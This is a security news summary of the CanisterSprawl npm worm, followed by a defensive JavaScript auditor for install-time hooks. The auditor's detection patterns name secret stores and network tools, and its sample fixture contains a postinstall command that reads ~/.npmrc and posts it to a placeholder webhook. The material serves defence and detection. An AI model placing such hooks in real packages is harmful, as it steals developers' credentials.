Self-Propagating Supply Chain Worm Hijacks npm Packages to Steal Developer Tokens

Researchers have flagged a supply-chain worm dubbed CanisterSprawl that uses compromised npm packages and stolen developer npm tokens to push poisoned releases and self-propagate via malicious postinstall hooks. The campaign exfiltrates extensive developer secrets to an HTTPS webhook and an ICP canister, includes PyPI propagation logic, and sits alongside other attacks like xinference compromises and the prt-scan GitHub Actions exploit. #CanisterSprawl #xinference

Key points

  • CanisterSprawl is a self-propagating supply-chain worm that spreads by stealing npm tokens and publishing poisoned package versions.
  • The malware abuses npm postinstall hooks to harvest a wide range of developer secrets, including .npmrc, SSH keys, cloud credentials, and local .env files.
  • Stolen data is exfiltrated to an HTTPS webhook and an ICP canister, making infrastructure takedown more difficult.
  • The campaign includes PyPI propagation logic to upload malicious Python packages when credentials are available, and JFrog reported that xinference versions were compromised with a teampcp-marked payload.
  • Related threats include malicious npm/PyPI packages that install LLM proxies and other backdoors, Asurion-impersonation packages, and the prt-scan GitHub Actions exploit targeting pull_request_target to steal secrets.
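The worm's foothold is the npm install-time lifecycle hook, so a defender's first check is which packages in a dependency tree declare such hooks and whether the project disables them. The following is an added example (not from the article, the CanisterSprawl report, or any of the named projects) that audits a constructed set of package manifests for install hooks touching the secret stores the article lists, and checks a `.npmrc` for the `ignore-scripts=true` mitigation; the package names and the `collect.js` command are constructed placeholders.

```javascript
// Added example: audit npm manifests for install-time lifecycle hooks (the hook the
// worm abuses) and check whether .npmrc disables them. In a real tree you would read
// every node_modules/**/package.json; the SAMPLE_TREE below is constructed.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators taken from the article: secret stores the worm harvests, plus signs that
// an install command talks to the network or evaluates inline code.
const SECRET_PATTERNS = [/\.npmrc/, /\.ssh\b/, /\.env\b/, /\.aws\b/, /NPM_TOKEN/];
const NETWORK_PATTERNS = [/https?:\/\//, /\bcurl\b/, /\bwget\b/, /\bfetch\(/, /node\s+-e\b/];

// Returns one finding per install hook a package declares, graded by how many
// indicator classes its command matches (0 = info, 1 = medium, 2 = high).
function auditPackage(pkg) {
  const scripts = (pkg.manifest && pkg.manifest.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const reasons = [];
    if (SECRET_PATTERNS.some((re) => re.test(cmd))) reasons.push("touches secret store");
    if (NETWORK_PATTERNS.some((re) => re.test(cmd))) reasons.push("network or inline eval");
    const severity = ["info", "medium", "high"][reasons.length];
    findings.push({ name: `${pkg.name}@${pkg.version}`, hook, cmd, severity, reasons });
  }
  return findings;
}

function auditTree(packages) {
  return packages.flatMap(auditPackage);
}

// Mitigation check: a .npmrc line "ignore-scripts=true" stops npm from running any
// lifecycle script, which neutralises postinstall-based harvesting outright.
function npmrcIgnoresScripts(npmrcText) {
  return npmrcText.split(/\r?\n/).some((line) => {
    const m = line.trim().match(/^ignore-scripts\s*=\s*(\S+)/i);
    return m !== null && m[1].toLowerCase() === "true";
  });
}

// Constructed sample tree: one clean package, one benign native-build hook, one hook
// that reads .npmrc and posts to a webhook (placeholder script and domain).
const SAMPLE_TREE = [
  { name: "pad-util", version: "1.0.0", manifest: { scripts: { test: "node test.js" } } },
  { name: "native-bind", version: "0.2.0", manifest: { scripts: { postinstall: "node-gyp rebuild" } } },
  { name: "poisoned-pkg", version: "3.1.4", manifest: { scripts: {
    postinstall: "node collect.js --include ~/.npmrc --post https://example.invalid/hook" } } },
];

module.exports = { auditPackage, auditTree, npmrcIgnoresScripts, SAMPLE_TREE };
```

Run `auditTree(SAMPLE_TREE)` against a real tree by building the list from every `node_modules/**/package.json`; any `high` finding, or any hook in a package whose new version you did not expect, is worth a look before the install is allowed to run.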

Read More: https://thehackernews.com/2026/04/self-propagating-supply-chain-worm.html